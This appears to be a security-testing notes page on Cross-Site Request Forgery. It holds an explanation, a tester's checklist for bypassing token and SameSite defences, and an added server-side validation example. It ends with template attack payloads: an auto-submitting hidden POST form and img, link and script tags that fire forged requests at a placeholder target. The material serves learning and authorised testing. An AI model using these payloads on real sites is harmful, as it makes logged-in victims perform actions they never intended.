CSRF


Last updated 11 months ago

What is it?

CSRF, short for Cross-Site Request Forgery, is a web security flaw that lets an attacker trick a user's browser into performing actions the user didn't intend to perform.

A simple example:

  • A vulnerable web application has the endpoint /updateProfile?id={userid}

  • When a POST request is made to this endpoint, the application:

    • Checks that the ID belongs to the current user

    • If it does, updates the profile with the information provided in the request body

  • When the victim visits the attacker's malicious site, the page:

    • Sends a request to the vulnerable web application

    • Because the user is logged into that application, the browser includes its cookies (importantly, the session cookie)

  • The vulnerable application processes the request as normal, since it arrived from the user's browser

It's important to note that we need some user interaction for CSRF to work. Typically an attacker would place their payload on a site that they control, and try to entice the target with phishing emails, direct messages on social media, etc. Once the user clicks the link and lands on the page, the payload is triggered.

CSRF defences are now pretty common, so along with just finding places where users can carry out actions, we also need to be able to bypass defences that have not been properly implemented.

Other learning resources:

  • PortSwigger: Web Security Academy - https://portswigger.net/web-security/csrf

  • The XSS Rat: Bug Bounty Beginner Methodology: CSRF - https://www.youtube.com/watch?v=uirJsgvN7Hc

  • swisskyrepo: PayloadsAllTheThings, CSRF Injection - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSRF%20Injection/README.md

Writeups:

Checklist

  • Does every form have a CSRF token?

  • Can we use GET instead of POST (i.e. can our payload be in the URI instead of the body)?

  • Test the token

    • Test without the token

      • Test other HTTP methods without the token (e.g. GET)

    • Test without the token value (keep the param name, e.g. &csrf=)

    • Test with a random token

    • Test a previous token

    • Test a token from a different session

    • Test with a token of the same length

    • Test for predictability

    • Test for static values

      • Test for known values (e.g. the token is the user-id)

    • Is the token tied to a cookie other than the session cookie?

      • Can the token be stolen with XSS?

  • Is the Referer header being used to validate the request origin?

  • Do the cookies have SameSite set? (Chrome is Lax by default)

    • Can we submit the request with GET?

    • Can we override HTTP methods with `X-Http-Method-Override: GET`?

      • Can we override HTTP methods with `_method=POST`?
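As an added example (not from the original page), the defender's side of the /updateProfile flow described above and of the checklist: a simulated server-side check that rejects each weak-token and method-override case the checklist probes. The application origin, server secret and the request shape (method, headers dict, form dict) are constructed for the example.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Constructed values for this example; a real app keeps the secret server-side only.
SERVER_SECRET = secrets.token_bytes(32)
TRUSTED_ORIGIN = "https://app.example"          # hypothetical application origin
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}
_used_nonces: set = set()                        # single-use tokens: a previous token is rejected

def issue_csrf_token(session_id: str) -> str:
    """Token = random nonce + HMAC(secret, session_id:nonce); bound to one session, unpredictable."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"

def csrf_token_valid(session_id: str, token) -> bool:
    """Rejects a missing token, an empty value (&csrf=), random / same-length / static tokens,
    tokens minted for another session, and tokens that were already consumed."""
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    if nonce in _used_nonces:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac.encode(), expected.encode()):   # constant-time compare
        return False
    _used_nonces.add(nonce)
    return True

def state_change_allowed(method: str, headers: dict, form: dict, session_id: str) -> bool:
    """Simulated check in front of an endpoint like /updateProfile.
    Returns True only when the request passes every CSRF control."""
    # 1. Only the real HTTP verb counts: GET, X-Http-Method-Override and _method never change state.
    if method.upper() not in STATE_CHANGING:
        return False
    # 2. Origin (falling back to Referer) must match the application's own origin.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False                             # design choice: no source header, no state change
    parsed = urlparse(source)
    if f"{parsed.scheme}://{parsed.netloc}" != TRUSTED_ORIGIN:
        return False
    # 3. The per-session, single-use token must be present and correct.
    return csrf_token_valid(session_id, form.get("csrf"))
```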

Exploitation

<!-- original payload generated from Burp Suite Pro: auto-submitting POST form -->
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://<target-site>/api/employees/add" method="POST">
      <input type="hidden" name="name" value="<payload-info>" />
      <input type="hidden" name="email" value="<payload-info>" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

<!-- GET variants, for endpoints that accept the payload in the URI -->
<!-- requires user interaction -->
<a href="http://<target-site>/api/employees/add?name=<payload-info>">Click Me</a>
<!-- doesn't require user interaction -->
<img src="http://<target-site>/api/employees/add?name=<payload-info>">
<script>
  // also no user interaction: navigates the browser to the GET endpoint
  document.location = 'https://<target-site>/employees/add?name=<payload-info>';
</script>